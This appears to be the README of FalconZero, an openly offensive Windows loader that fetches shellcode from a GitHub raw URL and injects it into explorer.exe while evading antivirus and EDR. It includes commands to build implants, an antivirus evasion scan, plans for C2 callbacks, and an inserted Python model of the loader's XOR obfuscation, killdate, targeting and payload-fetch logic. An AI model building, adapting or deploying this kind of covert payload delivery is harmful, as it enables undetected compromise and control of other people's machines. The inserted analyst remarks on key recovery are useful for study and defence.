Wannabe99/FALCONSTRIKE


FalconZero

Introducing FalconZero v1.0, a stealthy, targeted Windows loader for delivering second-stage payloads (shellcode) to the host machine undetected. It is the first public release of the Loader/Dropper component of the FALCONSTRIKE project.

Features

  • Dynamic shellcode execution
  • GitHub used as the payload storage area: the payload is fetched from a GitHub raw URL at runtime, so the implant itself carries no shellcode
  • Targeted implant loader: the payload executes only on targeted assets, which thwarts automated malware analysis and hinders reverse engineering on non-targeted assets
  • Killdates: the implant expires after a specific date
  • Stealthy shellcode injection technique that avoids allocating RWX memory pages in the victim process, to evade AV/EDRs; currently injects into explorer.exe
  • Sensitive strings obfuscated with XOR (this hides them from static string scanning, but XOR is not encryption: a known plaintext such as the https:// prefix of the raw URL recovers the key directly)

Demo

GIF demo

Usage

There are many hard things in life, but generating an implant shouldn't be one. That is why the generate_implant.py script was created: to make your life a breeze. The process is as simple as:

  • First generate your shellcode as a hex string.
  • Upload it to GitHub and copy the GitHub raw URL. For testing (MessageBox shellcode): https://raw.githubusercontent.com/slaeryan/DigitalOceanTest/master/messagebox_shellcode_hex_32.txt
  • Clone the repository, install the dependencies and run the generator:

    git clone https://github.com/slaeryan/FALCONSTRIKE.git
    cd FALCONSTRIKE
    pip3 install -r requirements.txt
    python3 generate_implant.py

Follow the on-screen instructions and you'll find the output in the bin directory if everything goes well.
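As an added example, not code from the FalconZero project, the Python below models the gates listed under Features (XOR-obfuscated config strings, killdate, target check) together with parsing the hex-string payload format the steps above publish on GitHub. The page does not say how FalconZero keys its targets or lays out its config, so the SHA-256-of-hostname token, the killdate comparison against the local date, the repeating XOR key, the URL and the three filler bytes standing in for shellcode are all assumptions for illustration.

```python
"""
Added example, not FalconZero's own code: a model of the gates a targeted
loader applies before it fetches and runs its stage-2 payload.  How the
checks are keyed is an assumption for illustration (the README does not
say): SHA-256 of the hostname as the target token, the killdate compared
to the local date, repeating-key XOR over config strings, and the payload
served as a hex string as the Usage section describes.
"""
import hashlib
from datetime import date

# Constructed sample data (hypothetical URL and key; "90 90 cc" is three
# filler bytes, not the MessageBox shellcode linked in the README).
XOR_KEY = b"\x5a\xa3\x17\xc9"
PAYLOAD_URL = "https://raw.githubusercontent.com/example/repo/main/payload_hex.txt"
SAMPLE_HEX_FILE = "90 90 cc\n"
KILLDATE = date(2021, 12, 31)
ACTIVE_DAY = date(2021, 6, 1)
EXPIRED_DAY = date(2022, 1, 1)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate_string(s: str, key: bytes) -> bytes:
    """What a generator would embed in the implant instead of the clear URL."""
    return xor_bytes(s.encode(), key)


def deobfuscate_string(blob: bytes, key: bytes) -> str:
    return xor_bytes(blob, key).decode()


def recover_xor_key(blob: bytes, known_prefix: bytes) -> bytes:
    """Analyst's view: XOR is obfuscation, not encryption.  A guessed
    plaintext prefix such as b"https://" yields the keystream directly."""
    return xor_bytes(blob[: len(known_prefix)], known_prefix)


def target_token(hostname: str) -> str:
    """Only this digest is stored in the implant, never the hostname itself."""
    return hashlib.sha256(hostname.strip().lower().encode()).hexdigest()


def is_target(hostname: str, allowed_tokens: set) -> bool:
    return target_token(hostname) in allowed_tokens


def killdate_passed(killdate: date, today: date) -> bool:
    """Implant stays active through the killdate and expires after it."""
    return today > killdate


def decode_hex_payload(text: str) -> bytes:
    """Parse the hex-string payload file: whitespace is ignored, anything
    that is not an even-length hex string is rejected before execution."""
    cleaned = "".join(text.split())
    if not cleaned or len(cleaned) % 2:
        raise ValueError("payload must be a non-empty, even-length hex string")
    return bytes.fromhex(cleaned)  # raises ValueError on non-hex characters


def loader_decision(cfg_blob, key, hostname, allowed_tokens, killdate, today, fetch):
    """Return ("run", shellcode) or ("abort", reason).  `fetch(url) -> str`
    stands in for the HTTP GET of the raw GitHub file.  The cheap local
    checks run first, so a sample detonated in a sandbox or after its
    killdate never touches the network."""
    if killdate_passed(killdate, today):
        return "abort", "killdate passed"
    if not is_target(hostname, allowed_tokens):
        return "abort", "non-target host"
    url = deobfuscate_string(cfg_blob, key)  # the clear URL exists only now
    try:
        shellcode = decode_hex_payload(fetch(url))
    except ValueError as exc:
        return "abort", f"bad payload: {exc}"
    return "run", shellcode


def run_demo() -> dict:
    """Exercise the three outcomes on the constructed inputs above."""
    blob = obfuscate_string(PAYLOAD_URL, XOR_KEY)
    allowed = {target_token("WS-FINANCE-07")}
    fetch = lambda url: SAMPLE_HEX_FILE  # offline stand-in for the GET
    return {
        "target": loader_decision(blob, XOR_KEY, "ws-finance-07", allowed, KILLDATE, ACTIVE_DAY, fetch),
        "sandbox": loader_decision(blob, XOR_KEY, "SANDBOX-VM", allowed, KILLDATE, ACTIVE_DAY, fetch),
        "expired": loader_decision(blob, XOR_KEY, "ws-finance-07", allowed, KILLDATE, EXPIRED_DAY, fetch),
    }


if __name__ == "__main__":
    for name, (verdict, detail) in run_demo().items():
        print(f"{name:8s} -> {verdict}: {detail!r}")
```

Two design points worth keeping in mind when building or analysing a loader of this kind: the local gates (killdate, target) should run before any network fetch, so non-target and stale samples never reveal the payload URL; and both protections here are weak against a determined analyst, since recover_xor_key shows the XOR key falling out of a guessed https:// prefix, and a hostname digest can be brute-forced from a list of candidate hostnames.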

AV Scan of FalconZero implant

FalconZero v1.0 Antiscan Result

TO-DO

This is an alpha release and, depending on the response, many more upgrades to the existing functionality are coming soon.

Some of them are:

  • Integrate various sandbox detection algorithms
  • Integrate support for stealthier shellcode injection techniques
  • Integrate function obfuscation to make the loader stealthier
  • Include a network component that calls back to a C2 when a Stage-2 payload is released, or to change targets/payloads and configure other options on the fly
  • Inject into a remote process for which network activity is not unusual, and fetch the shellcode from there (better OPSEC)
  • Include active-hours functionality: the loader becomes active only during a specified period of the day, etc.

Feel free to suggest any further feature that you want to see in the next release. Suggestions for improving existing features are also warmly welcome :)


Author

Upayan (@slaeryan) [slaeryan.github.io]

License

All the code included in this project is licensed under the terms of the GNU AGPLv3 license.
